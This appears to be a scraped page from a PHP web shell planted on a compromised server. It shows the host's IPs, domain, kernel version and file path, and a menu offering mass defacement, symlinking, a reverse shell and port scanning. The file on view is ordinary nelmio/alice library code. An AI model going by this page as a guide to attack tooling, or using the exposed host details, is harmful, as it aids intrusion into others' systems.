ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
nelmio
/
alice
/
src
/
Viewing: ObjectBag.php
<?php /* * This file is part of the Alice package. * * (c) Nelmio <hello@nelm.io> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ declare(strict_types=1); namespace Nelmio\Alice; use ArrayIterator; use Countable; use IteratorAggregate; use Nelmio\Alice\Definition\Object\CompleteObject; use Nelmio\Alice\Definition\Object\SimpleObject; use Nelmio\Alice\Throwable\Exception\InvalidArgumentExceptionFactory; use Nelmio\Alice\Throwable\Exception\ObjectNotFoundException; use Nelmio\Alice\Throwable\Exception\ObjectNotFoundExceptionFactory; /** * Value object containing a list of objects. */ final class ObjectBag implements IteratorAggregate, Countable { /** * @var ObjectInterface[] */ private $objects = []; private $array = []; public function __construct(array $objects = []) { foreach ($objects as $id => $object) { if ($object instanceof ObjectInterface) { if ($id !== $object->getId()) { throw InvalidArgumentExceptionFactory::createForReferenceKeyMismatch($id, $object->getId()); } $this->objects[$id] = $object; $this->array[$id] = $object->getInstance(); continue; } $this->objects[$id] = new CompleteObject( new SimpleObject($id, $object) ); $this->array[$id] = $object; } } /** * Creates a new instance which will contain the given object. If an object with the same reference already exists, * it will be overridden by the new object. */ public function with(ObjectInterface $object): self { $clone = clone $this; $clone->objects[$object->getId()] = $object; $clone->array[$object->getId()] = $object->getInstance(); return $clone; } /** * Creates a new instance which will no longer contain the given object. * * @param FixtureInterface|ObjectInterface $objectOrFixture */ public function without($objectOrFixture): self { $clone = clone $this; unset($clone->objects[$objectOrFixture->getId()], $clone->array[$objectOrFixture->getId()]); return $clone; } /** * Creates a new instance with the new objects. If objects with the same reference already exists, they will be * overridden by the new ones. * * @param ObjectBag $objects */ public function mergeWith(self $objects): self { $clone = clone $this; foreach ($objects->objects as $reference => $object) { $clone->objects[$reference] = $object; $clone->array[$reference] = $object->getInstance(); } return $clone; } public function has(FixtureIdInterface $fixture): bool { return isset($this->objects[$fixture->getId()]); } /** * @throws ObjectNotFoundException */ public function get(FixtureIdInterface $fixture): ObjectInterface { if ($this->has($fixture)) { return $this->objects[$fixture->getId()]; } throw ObjectNotFoundExceptionFactory::create( $fixture->getId(), $fixture instanceof FixtureInterface ? $fixture->getClassName() : 'no class given' ); } public function count() { return count($this->objects); } public function getIterator() { return new ArrayIterator($this->objects); } public function toArray(): array { return $this->array; } }
Coded With 💗 by
0x6ick